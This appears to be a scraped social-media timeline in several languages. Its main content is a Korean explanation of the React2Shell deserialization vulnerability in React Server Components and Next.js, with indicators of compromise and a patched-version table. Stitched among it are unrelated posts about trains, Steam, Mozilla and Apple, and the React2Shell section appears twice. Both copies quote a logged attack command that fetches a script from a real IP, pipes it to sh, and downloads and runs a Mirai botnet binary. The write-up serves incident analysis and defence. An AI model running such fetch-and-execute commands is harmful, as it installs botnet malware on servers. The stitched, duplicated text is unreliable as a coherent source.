__proto__, constructor )๋ฅผ ํตํด Prototype์ ๋ณ์กฐํ ์ ์๋ ์ ๊ทผ์ฑ์ ๊ฐ์ง๊ณ ์๋ค๋ ๊ฒ์ ์ ์ ์๋ค. ์ฉ์ด๋ก๋ "JavaScript prototype pollution"๋ผ๊ณ ํ๋ค.then ํค์๋๋ฅผ ํตํด ๊ณต๊ฒฉ ๋์ ๋ด๋ถ์ ์กด์ฌํ๋ Promise ๊ฐ์ฒด์ ๋ถ๊ฒ ๋ค(๋๋ ์๋ก์ด Promise ๊ฐ์ฒด๋ฅผ ๋ง๋ค๊ฒ ๋ค)๋ ์๋๋ฅผ ํ์ธํ ์ ์๋ค.value ํ๋ ๊ฐ์ด ์์ง ์ญ์ง๋ ฌํ ๋๊ธฐ ์ ์ ๋ฌธ์์ด ํํ์ JSON์ธ ๊ฒ์ผ๋ก ๋ดค์ ๋, ๊ณต๊ฒฉ ๋์ ๋ด๋ถ์์ JSON.parse ๋ฉ์๋์ ํธ์ถ์ ์์ํ ์ ์๋ค._response._prefix ์ ์ฃผ์
์ then ํค์๋๊ฐ ๋ฑ์ฅํ๋ ์์น์ ์ต๋ํ ๊ฐ๊น์ด ๊ณณ์์ ์ผ์ด๋์ผ ํ๋ค. ๊ทธ๋์ผ Promise ๊ฐ์ฒด๊ฐ ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ํธ๋ฆฌ๊ฑฐํ ์ ์๊ธฐ ๋๋ฌธ์ด๋ค.then ์์ฑ์ ๊ฐ์ง๋ฉด์, ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ์์ฉํ ์ ์๋ ๊ฐ์ฅ ์ฐ๊ด์ฑ ๋์ ํํ์ด๋ผ๋ ์ ์ ๋ชจ๋ ๋ง์กฑํ๋ ๋ถ๋ถ์ {"then": "$Bx"}๋ผ๋ ๊ฒ์ ์ ์ ์๋ค. $Bx๋ฅผ ์ฒ๋ฆฌํ๋ ๊ณผ์ ์ค (๋๋ $Bx๊ฐ ์ฒ๋ฆฌํ ๊ฒฐ๊ณผ์ ๋ํ ์ฌํ) ๊ฒ์ฆ์ด ๋ถ์กฑํ๋ค๋ ์๋ฏธ์ด๋ค.Next-Action ํค๋๋ ์ ์ด์ ์ด ์ทจ์ฝ์ ์ ์์ธ์ด ๋ ์ด๋ค ๊ธฐ๋ฅ์ ์ผ๊ณ ๋๋ ๊ฒ์ ๊ดํ ๊ฒ์์ ์์ํ ์ ์๋ค. ๊ฐ๋ฐ๋ ์ฑ์ ์กด์ฌํ๋ ์ ํจํ ์ก์
์ ๋ํ Key๋ฅผ ์ ์ ์๋ค๋ฉด ๊ทธ ์ก์
์ ์คํ์ ์์ฒญํจ์ผ๋ก์ ๊ณต๊ฒฉ ์ฝ๋ ๋ํ ์คํํ ์ ์์ ๊ฒ์ด๋ค.Catswords OSS๋ก ์ ๋ณด๋ ๋ด์ฉ์ ๋ฐ๋ฅด๋ฉด, React2Shell์ ๋ ธ์ถ๋ ์๋ฒ๋ ์ด๋ฐ ๋ช ๋ น์ด ๋ค์ด์จ๋ค๊ณ ํ๋ค. ํ ํ์์ด ํ์ต์ฉ์ผ๋ก ๊ตฌ์ถํ React ์๋ฒ์์ ๋ฐ๊ฒฌ๋ ๋ก๊ทธ์ด๋ค.
(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
cd /dev; \
busybox wget http://31.56.27.76/n2/x86; \
chmod 777 x86; \
./x86 reactOnMynuts)์ด ํ์ผ์ ์ ์ฒด๋ Mirai botnet์ด๋ผ ๋ถ๋ฅด๋ ๊ณ์ด์ ์ ์ฑ์ฝ๋์ด๋ค. React2Shell์ ์ทจ์ฝํ ์๋ฒ๋ค์ ์ด๋ฐ ์ ์ฑ์ฝ๋๋ค์ ์๋ฒ์ ์ฃผ์ ๋ฐ๊ฒ ๋๋ค.
๊ทธ๋ผ ์ด ์ ์ฑ์ฝ๋์ ๋ช ์ฑ(?)์ ์ด๋์ ๋์ผ์ง ํ๋ฒ ์ฒดํฌํด๋ณด์.
(๊ทธ๋ ๋ ๋์๊ฑฐ ์์์ผ๋ ๊ทธ๋ง ์์๋ณด์)
๊ด๋ จ IoC ๋ ๋ค์๊ณผ ๊ฐ๋ค.
3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)http://193.34.213.150/nuts/bolts (URL)http://31.56.27.76/n2/x86 (URL)๋ฒ์ฉ botnet์ด ์ค์น๋๊ธฐ ๋๋ฌธ์ ์ฌ์ค์ DDoS ๊ณต๊ฒฉ ๋ฑ ๋ค์ํ ๋ชฉ์ ์ผ๋ก ์ ์ฉ๋๋ ์๋ฒ๊ฐ ๋๋ค.
์ถ๊ฐ ๋ถ์์ ์๋ ๋งํฌ์์ ํ์ธํ ์ ์๋ค.
Next.js๋ฅผ ์ฌ์ฉํ๋ ์๋ฒ๋ผ๋ฉด ์ทจ์ฝ์ ์ด ํด๊ฒฐ๋ ๋ฒ์ ์ผ๋ก ์ ๋ฐ์ดํธํ์ฌ์ผ ํ๋ค. Next.js์ ๊ฐ๋ฐ์ฌ Vercel์ ์ทจ์ฝํ ๋ฒ์ ์ ๋ํด ๋ค์๊ณผ ๊ฐ์ด ์๋ดํ๊ณ ์๋ค.
| Vulnerable version | Patched release |
|---|---|
| Next.js 15.0.x | 15.0.5 |
| Next.js 15.1.x | 15.1.9 |
| Next.js 15.2.x | 15.2.6 |
| Next.js 15.3.x | 15.3.6 |
| Next.js 15.4.x | 15.4.8 |
| Next.js 15.5.x | 15.5.7 |
| Next.js 16.0.x | 16.0.10 |
| Next.js 14 canaries after 14.3.0-canary.76 | Downgrade to 14.3.0-canary.76 (not vulnerable) |
| Next.js 15 canaries before 15.6.0-canary.58 | 15.6.0-canary.58 |
| Next.js 16 canaries before 16.1.0-canary.12 | 16.1.0-canary.12 and after |
ํน์ฌ ์ ๋ฐ์ดํธ์ ๊ณค๋์ ๊ฒช๊ณ ์๋ ๊ฒฝ์ฐ, Vercel์์ ๊ณต์ ์ ๊ณตํ๋ ํจ์น ๋๊ตฌ๋ฅผ ํ์ฉํ๋ ๊ฒ๋ ์ข์ ๋ฐฉ๋ฒ์ด ๋ ์ ์๋ค.
Next-Action ํค๋ + ์์คํ
OS ๋ช
๋ น์ด + ์๋ฐ์คํฌ๋ฆฝํธ์ Array ๋๋ Object ๊ด๋ จ ๋ฉ์๋, ์ด๋ ๊ฒ 3์์๊ฐ ๊ฐ์ ์์ฒญ์ ๋์์ ๋ค์ด์๋๊ฑด ํํ ์ํฉ์ ์๋๋ผ๋ ์ ์ ๊ณ ๋ คํด์ ์ฐจ๋จ ๊ท์น์ ๋ง๋๋ ๊ฒ๋ ๋ฐฉ๋ฒ์ด ๋ ์ ์๋ค.
๊ตฌํ ์ค์ธ ๋ฆฐํฐ์ ์ฝ๋ ์์ ์ ์ ๊ธฐ๋ฅ์ ๋ถ๋ถ์ ์ผ๋ก ํ๋ฒ ํ์ ์ฆ๋ช ์ ์ ์ฉํด๋ณผ๋ง ํ ๊ฒ ๊ฐ๊ธฐ๋ ํ๋ค
#Wuppertal #Bahn Diskussion
Seit Samstag, 13.12.2025, ist das DB-Reisezentrum im Wuppertaler Hauptbahnhof dauerhaft geschlossen. Fahrkarten und Auskรผnfte sollen kรผnftig online oder per App erfolgen. Damit fรคllt ein wichtiger Ort persรถnlicher Beratung weg โ mit negativen Folgen fรผr Servicequalitรคt und #Barrierefreiheit, etwa fรผr รคltere Menschen oder bei komplexen Reisen.
https://www.wz.de/nrw/wuppertal/bahn-schliesst-reisezentrum-am-wuppertaler-hauptbahnhof-massnahme-sorgt-fuer-unmut-und-frust_aid-140797357
๋ง์ด ์ํ๋ค๊ณ ์๊ฐํ๋๋ฐ ๊ฝค ๋ง์ด ํ๋ค?
store.steampowered.com/replay/76561...
chomu's STEAM REPLAY 2025
ใใคใใฟใผใงๆต่กใฃใใใฎใใกใใฃใจ้
ใใฆMisskeyใซๅ
ฅใฃใฆใใใฎๅฅฝใใชใใ ใใฉ
ใใใฃใต๏ฝใโฅ๏ธโฏโฏใ๏ฝใโฅ๏ธใใฏใใธใใซใใใฎใๅ
ใ ใฃใ
#google just keeps hammering out the features that would have been useful five years ago
http://workspaceupdates.googleblog.com/2025/12/share-stereo-sound-google-meet.html
์์ ์ค์๋ ๋ฐฐ์์ ๊ธฐํ๋ก ์ฌ๊ธฐ๋ฉฐ ๊ธ์ ์ ์ธ ๋ง์๊ฐ์ง์ผ๋ก ๋์ ํ์ธ์.
Vivaldi - Spinosi - Stabat Mater
ํ ๋ ๊ทธ๋จ์ด ํจ์คํค๋ฅผ ์ง์ํ๋ค.
ใงใใ
ๆญปไบกๅๆฉ
ใไฝใใจใฏ่จใใใ็ก่จใงใใฃใจไธฆในใใใใจใผใฐใซใใจใณใณใใใใตใใฌใซ็ฌใฃใฆใ
my new teto...
normals_revisited: revisiting a known normal transformation in computer graphics (2019) via 
@lesleyLesley Lai https://lobste.rs/s/luylma #graphics #math
https://github.com/graphitemaster/normals_revisited
GitHubใณใใใๆค็ดขๆฉ่ฝใชใใฎใใใ
ใใณใณใณ
์ธ์์ ์ค์ํ ์๊ฐ์ ์ํ ์กฐ์ธ
1. ์คํจ๋ฅผ ๋๋ ค์ํ์ง ๋ง๊ณ ๋ฐฐ์์ ๊ธฐํ๋ก ์ฌ๊ธด๋ค
2. ์์ ์ฑ์ทจ์๋ ์ค์ค๋ก๋ฅผ ๊ฒฉ๋ คํ์
3. ํ์ฌ์ ์ถฉ์คํ๋ฉด์ ๋ฏธ๋๋ฅผ ์ค๋นํ๋ค
4. ์์ ์ ๊ฐ์น๋ฅผ ๋ฏฟ๊ณ ์์กด๊ฐ์ ๋์ธ๋ค
5. ๊ธ์ ์ ์ธ ๋ง์ธ๋๋ก ์ด๋ ค์์ ๊ทน๋ณตํ๋ค
ใใณใณใณ
์ค์๊ฒ ๋ฐ๊ฒฌํ๋๋ฐ ์ค๋์ ์ฒด์ธ์ ๋จน๊ณ ์ถ์ง ์์๋ฐ
ํ์ด! ๊ฐ๋ฐ๋ฆฌ๋ง์ค!
่ฒทใ็ฉใใโ
โ
ๅ ไธใฎๅใๅณใใใใพใ่ฏใใชใใใ
IOSใขใใใใฆใใไบบใฎใใญใๅบใ้ ปๅบฆ้ซใใฆๆฃฎใใชใใ ใฃใใ่งฆใฃใฆใชใใฎใซๅบใๆใใใๆใใ
๋ฌธ๋ธ๋ฆฌ์จ ์๋ง์ถํด์ ๊ฐ๋ง์ ๋ค๋ ๋ค
์๋๊ฒ ๋ค ๋ธ์ค์ ์จ์ผ์ง ๋จธ๋ฆฌ๊ฐ์ผ๋ฌ ๊ฐ๋๋ค.
Locked out: How a gift card purchase destroyed an Apple account
Link: https://appleinsider.com/articles/25/12/13/locked-out-how-a-gift-card-purchase-destroyed-an-apple-account
Discussion: https://news.ycombinator.com/item?id=46297336
ํ์ด! ๊ฐ๋ฐ๋ฆฌ๋ง์ค!
โ
โ
๊ณ ๋จํ @gnh1201@hackers.pub
์ธ๋ถ์์ ์์ ๋ ํน์ ํ ๊ท๊ฒฉ์ ๋ฐ๋ผ ๊ตฌ์กฐ์ ์ผ๋ก ์์ฑ๋ ๋ฐ์ดํฐ๋ฅผ ์ฒ๋ฆฌํ๋ค๋ฉด, ๊ณต๊ฒฉ์๊ฐ ์ด๋ ํ ์๋๋ฅผ ๊ฐ์ง๊ณ ์๋ค๋ฉด ๋ฐ์ดํฐ๋ฅผ ๋ณด๋ผ ๋ ์คํ ๊ฐ๋ฅํ ์ ์์ ์ฝ๋๋ฅผ ๊ฐ์ด ๋ฃ์ด ๋ณด๋ผ ๊ฐ๋ฅ์ฑ์ ๋ฐฐ์ ํ ์ ์๋ค.
์ด๊ฒ์ด ๋ณด์ ์ฝ์ ์ด ๋์ง ์๊ธฐ ์ํด์ ์ด๋ฌํ ๊ณต๊ฒฉ์์ ์๋๋ฅผ ๋ง์์ผํ์ง๋ง, React2Shell (CVE-2025-55182) ์ทจ์ฝ์ ์ ์ด๋ฌํ ๊ณต๊ฒฉ์์ ์๋๋ฅผ ๋ง์ง ๋ชปํ๊ณ ์คํ์ ๋ฌด์ ํ ํ์ฉํ๋ ๋ฐฉ๋ฒ์ด ๋ฐ๊ฒฌ๋ ๊ฒ์ด๋ค.
ํน์ ํ ๊ท๊ฒฉ์ ๋ฐ๋ผ ๊ตฌ์กฐ์ ์ผ๋ก ์์ฑ๋ ๋ฐ์ดํฐ๋ฅผ ์ฒ๋ฆฌํ๋ ๊ณผ์ ์ ์ผ์ปซ๋ ์ฉ์ด๋ฅผ "์ญ์ง๋ ฌํ"(Deserialization)์ด๋ผ๊ณ ํ๋ค.
ํน์ ํ ๊ท๊ฒฉ์ ์ ์๋ ค์ง JSON, XML, YAML๊ฐ ๋ ์๋ ์๊ณ , ์์ฒด ๊ท๊ฒฉ์ด ๋ ์๋ ์๊ณ , ํผํฉํ์ด ๋ ์๋ ์๋ค. React2Shell ์ทจ์ฝ์ ์ ํผํฉํ(JSON + aka. Flight)์ ์ฌ์ฉํ์๋ค.
์์ฒด ๊ท๊ฒฉ(aka. Flight)์ด JavaScript๋ก ์ ์๋ ๊ฐ์ฒด์ ์ฑ๊ฒฉ์ ์์๋ก ๋ณ๊ฒฝ(Prototype ๊ฐ๋
์ ์กด์ฌํ๋ ์์ฑ์ ์์ค์ ์์ฑ(__proto__, constructor)์ ์ ๊ทผํ์ฌ ๊ฐ์ฒด์ ์ฑ๊ฒฉ์ ์์๋ก ๋ฐ๊ฟ ์ ์์)ํ๋๋ฐ ํ์ํ ์ ๊ทผ์ฑ์ ๊ฐ์ง๊ณ ์์๊ธฐ์ ๊ฐ๋ฅํ ๊ฒ์ด์๋ค.
์ค๋ฌด์ ์ผ๋ก ์ญ์ง๋ ฌํ ๊ณผ์ ์ด ์ํํด์ง๋ ์ด์ ๋ ๋ค์๊ณผ ๊ฐ๋ค.
์ด ์ธ์๋ ์ญ์ง๋ ฌํ ๊ณผ์ ์ ์ ์ฌํ ์ฌ๋ฌ ์ทจ์ฝ ๊ฐ๋ฅ์ฑ์ ๊ฐ์ง๊ณ ์๊ธฐ ๋๋ฌธ์, ์ญ์ง๋ ฌํ ๊ณผ์ ์ ๋ณดํธํ๊ธฐ ์ํ ์ฌ๋ฌ ๋ณด์ ์ฅ์น์ ๊ตฌํ์ด ํ์ํ๋ค.
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ด ์ด๋ค ์ฑ๊ฒฉ์ ๊ฐ์ง๋ ์ทจ์ฝ์ ์ธ์ง ๋น ๋ฅด๊ฒ ์ดํดํ๊ธฐ ์ํด์ , ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ๊ณผ ์ฐ๊ด์ด ์๋ ์ทจ์ฝ์ ์ฌ๋ก์ ๊ณตํต์ ์ธ ํน์ง์ ์ดํด๋ณผ ์ ์๋ค. ๊ทธ ์ฌ๋ก๋ ๋ค์๊ณผ ๊ฐ๋ค.
| ์ธ์ด / ์ํ๊ณ | ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ฌ๋ก | ์ฃผ์ ๊ณตํต์ |
|---|---|---|
| Java | CVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind) | ์ธ๋ถ ์ ๋ ฅ์ด ๊ฐ์ฒด ์์ฑยท์ญ์ง๋ ฌํ ๊ฒฝ๋ก(JNDI, XML/JSON ๋ฐ์ธ๋ฉ) ๋ก ์ ์ ๋์ด gadget chain ๋๋ ์๊ฒฉ ํด๋์ค ๋ก๋ฉ์ ํตํด RCE ๋ฐ์ |
| .NET (C# / VB.NET) | CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase) | BinaryFormatterยทViewState ๋ฑ ๋ ๊ฑฐ์ ์ญ์ง๋ ฌํ ํฌ๋งท์ ์ ๋ขฐํ์ฌ ์์ ํ์
๋ก๋ฉยท์ฝ๋ ์คํ |
| Python | CVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS) | pickleยทunsafe YAML ๋ก๋ ์ฌ์ฉ์ผ๋ก ์ญ์ง๋ ฌํ ์์ฒด๊ฐ ์คํ ํธ๋ฆฌ๊ฑฐ |
| PHP (WP) | CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress) | unserialize() / maybe_unserialize()์ ์ฌ์ฉ์ ์
๋ ฅ์ด ์ ๋ฌ๋์ด PHP Object Injection(POP chain) ๋ฐ์ |
| Ruby | CVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal) | YAML.loadยทMarshal.load ์ฌ์ฉ ์ ์์ ๊ฐ์ฒด ์์ฑ โ ์ฝ๋ ์คํ |
| JavaScript / Node.js | CVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript) | ๊ตฌ์กฐ ๋ณต์ยท๊ฐ์ฒด ์ฌ๊ตฌ์ฑ ๋ก์ง์ด ์ ๋ขฐ๋์ง ์์ ์ ๋ ฅ์ ์ฝ๋/๊ฐ์ฒด๋ก ํด์ |
| Go | CVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul) | Unmarshal ๋จ๊ณ์์ ์ ๋ ฅ ๊ฒ์ฆ ๋ถ์กฑ โ ๊ตฌ์กฐ์ฒด ๋ณต์ ๊ธฐ๋ฐ ๋ก์ง ๋ถ๊ดดยทDoS |
| Rust | GHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687) | ๋ฉ๋ชจ๋ฆฌ ์์ ๊ณผ ๋ฌด๊ดํ๊ฒ serde ๊ธฐ๋ฐ ์ญ์ง๋ ฌํ์์ ์ ๋ขฐ๋์ง ์์ ๋ฐ์ดํฐ๊ฐ ๋ด๋ถ ํ์ ์ผ๋ก ๋ณต์๋์ด ๋ก์ง ์ค์ผยทDoSยท์ ์ฌ์ ์ฝ๋ ์คํ ์ํ |
| Kotlin / Android | CVE-2024-43080 (Android) / CVE-2024-10382 (Android Car) | Intent/Bundle/IPC ์ญ์ง๋ ฌํ ์ ํ์ ยท๊ฒ์ฆ ๋ฏธํก โ ๊ถํ ์์นยทDoS |
| C / C++ | CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf) | Unpack ๊ณผ์ ์์ ๋ฐ์ดํฐํ์
(VARIANT), vtable ํฌ์ธํฐ ์ค์ผ ๋ฑ ๋ฌด๊ฒฐ์ฑ ๊ฒ์ฆ ๋ถ์กฑ |
| Swift / iOS | CVE-2021-32742 (Vapor) | ์ธ๋ถ ์ ๋ ฅ์ ๋์ฝ๋ฉ/๊ฐ์ฒด ๋ณต์ ์ ์ ๋ขฐ ๊ฒฝ๊ณ ๋ถ๊ดด โ DoSยท์ ๋ณด ๋ ธ์ถ |
| ์ฐ์ ์ฉ (ICS/OT) | CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC) | ํ๋ก์ ํธ ํ์ผยท๊ด๋ฆฌ ์๋ฒ ์ ๋ ฅ์ ์ ๋ขฐ๋ ๋ด๋ถ ๋ฐ์ดํฐ๋ก ๊ฐ์ ํ๊ณ ์ญ์ง๋ ฌํ โ RCE ๋ฐ ๋ฌผ๋ฆฌ ์์คํ ์ํฅ ๊ฐ๋ฅ |
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ ์ธ์ด์ ํ๊ฒฝ์ ๊ฐ๋ฆฌ์ง ์๊ณ ๋ค์ํ๊ฒ ๋ํ๋๊ณ ์์ผ๋ฉฐ, ๋ฐ๊ฒฌ๋ ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ ์ทจ์ฝ์ ์ ์(CVSS 3.x)์์๋ 8.0์์ 10.0 ๋ฒ์์ ๋งค์ฐ ๋์ ์ ์๋ฅผ ๋ฐ๊ณ ์๋ค.
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ด ์ด๋ค ๊ณตํต์ ์ธ ํน์ฑ์ ๊ฐ์ง๋์ง ์ค๋ช ํ์ผ๋, ์ด์ React2Shell ๊ณต๊ฒฉ์ ๊ฐ๋ ์ฆ๋ช (PoC)์์ ๋ณด์ธ ๊ณต๊ฒฉ ํน์ฑ์ ์ฌ์ ์ ๋ณด(๊ณต๊ฒฉ ๋์์ธ RSC์ ๋ด๋ถ ์ดํด)๊ฐ ์์ด๋ ์ด๋์ ๋ ํ์ ํ ์ ์๋ค.
์ฌ๊ธฐ ๊ฐ๊ฐ JavaScript์ Python์ผ๋ก ์์ฑ๋ ์ฃผ์ ๊ณต๊ฒฉ ๊ฐ๋ ์ฆ๋ช ์ฝ๋๊ฐ ์๋ค.
์ฌ๊ธฐ์ ์ ์ ์๋ ์ ๋ณด๋ ๋ค์๊ณผ ๊ฐ๋ค.
ใใ
ใใ
์์ฆ๋ฏธ๋ ๐ 
์ฏ๋ฐฉ 
๐๏ธ 
ๆฐ่้บฆ
nulta
__proto__, constructor )๋ฅผ ํตํด Prototype์ ๋ณ์กฐํ ์ ์๋ ์ ๊ทผ์ฑ์ ๊ฐ์ง๊ณ ์๋ค๋ ๊ฒ์ ์ ์ ์๋ค. ์ฉ์ด๋ก๋ "JavaScript prototype pollution"๋ผ๊ณ ํ๋ค.then ํค์๋๋ฅผ ํตํด ๊ณต๊ฒฉ ๋์ ๋ด๋ถ์ ์กด์ฌํ๋ Promise ๊ฐ์ฒด์ ๋ถ๊ฒ ๋ค(๋๋ ์๋ก์ด Promise ๊ฐ์ฒด๋ฅผ ๋ง๋ค๊ฒ ๋ค)๋ ์๋๋ฅผ ํ์ธํ ์ ์๋ค.value ํ๋ ๊ฐ์ด ์์ง ์ญ์ง๋ ฌํ ๋๊ธฐ ์ ์ ๋ฌธ์์ด ํํ์ JSON์ธ ๊ฒ์ผ๋ก ๋ดค์ ๋, ๊ณต๊ฒฉ ๋์ ๋ด๋ถ์์ JSON.parse ๋ฉ์๋์ ํธ์ถ์ ์์ํ ์ ์๋ค._response._prefix ์ ์ฃผ์
์ then ํค์๋๊ฐ ๋ฑ์ฅํ๋ ์์น์ ์ต๋ํ ๊ฐ๊น์ด ๊ณณ์์ ์ผ์ด๋์ผ ํ๋ค. ๊ทธ๋์ผ Promise ๊ฐ์ฒด๊ฐ ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ํธ๋ฆฌ๊ฑฐํ ์ ์๊ธฐ ๋๋ฌธ์ด๋ค.then ์์ฑ์ ๊ฐ์ง๋ฉด์, ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ์์ฉํ ์ ์๋ ๊ฐ์ฅ ์ฐ๊ด์ฑ ๋์ ํํ์ด๋ผ๋ ์ ์ ๋ชจ๋ ๋ง์กฑํ๋ ๋ถ๋ถ์ {"then": "$Bx"}๋ผ๋ ๊ฒ์ ์ ์ ์๋ค. $Bx๋ฅผ ์ฒ๋ฆฌํ๋ ๊ณผ์ ์ค (๋๋ $Bx๊ฐ ์ฒ๋ฆฌํ ๊ฒฐ๊ณผ์ ๋ํ ์ฌํ) ๊ฒ์ฆ์ด ๋ถ์กฑํ๋ค๋ ์๋ฏธ์ด๋ค.Next-Action ํค๋๋ ์ ์ด์ ์ด ์ทจ์ฝ์ ์ ์์ธ์ด ๋ ์ด๋ค ๊ธฐ๋ฅ์ ์ผ๊ณ ๋๋ ๊ฒ์ ๊ดํ ๊ฒ์์ ์์ํ ์ ์๋ค. ๊ฐ๋ฐ๋ ์ฑ์ ์กด์ฌํ๋ ์ ํจํ ์ก์
์ ๋ํ Key๋ฅผ ์ ์ ์๋ค๋ฉด ๊ทธ ์ก์
์ ์คํ์ ์์ฒญํจ์ผ๋ก์ ๊ณต๊ฒฉ ์ฝ๋ ๋ํ ์คํํ ์ ์์ ๊ฒ์ด๋ค.Catswords OSS๋ก ์ ๋ณด๋ ๋ด์ฉ์ ๋ฐ๋ฅด๋ฉด, React2Shell์ ๋ ธ์ถ๋ ์๋ฒ๋ ์ด๋ฐ ๋ช ๋ น์ด ๋ค์ด์จ๋ค๊ณ ํ๋ค. ํ ํ์์ด ํ์ต์ฉ์ผ๋ก ๊ตฌ์ถํ React ์๋ฒ์์ ๋ฐ๊ฒฌ๋ ๋ก๊ทธ์ด๋ค.
(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
cd /dev; \
busybox wget http://31.56.27.76/n2/x86; \
chmod 777 x86; \
./x86 reactOnMynuts)์ด ํ์ผ์ ์ ์ฒด๋ Mirai botnet์ด๋ผ ๋ถ๋ฅด๋ ๊ณ์ด์ ์ ์ฑ์ฝ๋์ด๋ค. React2Shell์ ์ทจ์ฝํ ์๋ฒ๋ค์ ์ด๋ฐ ์ ์ฑ์ฝ๋๋ค์ ์๋ฒ์ ์ฃผ์ ๋ฐ๊ฒ ๋๋ค.
๊ทธ๋ผ ์ด ์ ์ฑ์ฝ๋์ ๋ช ์ฑ(?)์ ์ด๋์ ๋์ผ์ง ํ๋ฒ ์ฒดํฌํด๋ณด์.
(๊ทธ๋ ๋ ๋์๊ฑฐ ์์์ผ๋ ๊ทธ๋ง ์์๋ณด์)
๊ด๋ จ IoC ๋ ๋ค์๊ณผ ๊ฐ๋ค.
3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)http://193.34.213.150/nuts/bolts (URL)http://31.56.27.76/n2/x86 (URL)๋ฒ์ฉ botnet์ด ์ค์น๋๊ธฐ ๋๋ฌธ์ ์ฌ์ค์ DDoS ๊ณต๊ฒฉ ๋ฑ ๋ค์ํ ๋ชฉ์ ์ผ๋ก ์ ์ฉ๋๋ ์๋ฒ๊ฐ ๋๋ค.
์ถ๊ฐ ๋ถ์์ ์๋ ๋งํฌ์์ ํ์ธํ ์ ์๋ค.
Next.js๋ฅผ ์ฌ์ฉํ๋ ์๋ฒ๋ผ๋ฉด ์ทจ์ฝ์ ์ด ํด๊ฒฐ๋ ๋ฒ์ ์ผ๋ก ์ ๋ฐ์ดํธํ์ฌ์ผ ํ๋ค. Next.js์ ๊ฐ๋ฐ์ฌ Vercel์ ์ทจ์ฝํ ๋ฒ์ ์ ๋ํด ๋ค์๊ณผ ๊ฐ์ด ์๋ดํ๊ณ ์๋ค.
| Vulnerable version | Patched release |
|---|---|
| Next.js 15.0.x | 15.0.5 |
| Next.js 15.1.x | 15.1.9 |
| Next.js 15.2.x | 15.2.6 |
| Next.js 15.3.x | 15.3.6 |
| Next.js 15.4.x | 15.4.8 |
| Next.js 15.5.x | 15.5.7 |
| Next.js 16.0.x | 16.0.10 |
| Next.js 14 canaries after 14.3.0-canary.76 | Downgrade to 14.3.0-canary.76 (not vulnerable) |
| Next.js 15 canaries before 15.6.0-canary.58 | 15.6.0-canary.58 |
| Next.js 16 canaries before 16.1.0-canary.12 | 16.1.0-canary.12 and after |
ํน์ฌ ์ ๋ฐ์ดํธ์ ๊ณค๋์ ๊ฒช๊ณ ์๋ ๊ฒฝ์ฐ, Vercel์์ ๊ณต์ ์ ๊ณตํ๋ ํจ์น ๋๊ตฌ๋ฅผ ํ์ฉํ๋ ๊ฒ๋ ์ข์ ๋ฐฉ๋ฒ์ด ๋ ์ ์๋ค.
Next-Action ํค๋ + ์์คํ
OS ๋ช
๋ น์ด + ์๋ฐ์คํฌ๋ฆฝํธ์ Array ๋๋ Object ๊ด๋ จ ๋ฉ์๋, ์ด๋ ๊ฒ 3์์๊ฐ ๊ฐ์ ์์ฒญ์ ๋์์ ๋ค์ด์๋๊ฑด ํํ ์ํฉ์ ์๋๋ผ๋ ์ ์ ๊ณ ๋ คํด์ ์ฐจ๋จ ๊ท์น์ ๋ง๋๋ ๊ฒ๋ ๋ฐฉ๋ฒ์ด ๋ ์ ์๋ค.
Can't wait to hear the stompy stompy on the roof when the herd of elephants arrives pulling John Mastodon's sleigh
I've never seen anyone hating Mozilla as much as Mozilla.
@Em0nM4stodonEm 
#Mozilla is a crystal clear case of the iron law of institutions:
People would much rather see their organization diminish in power than lose power within the organization
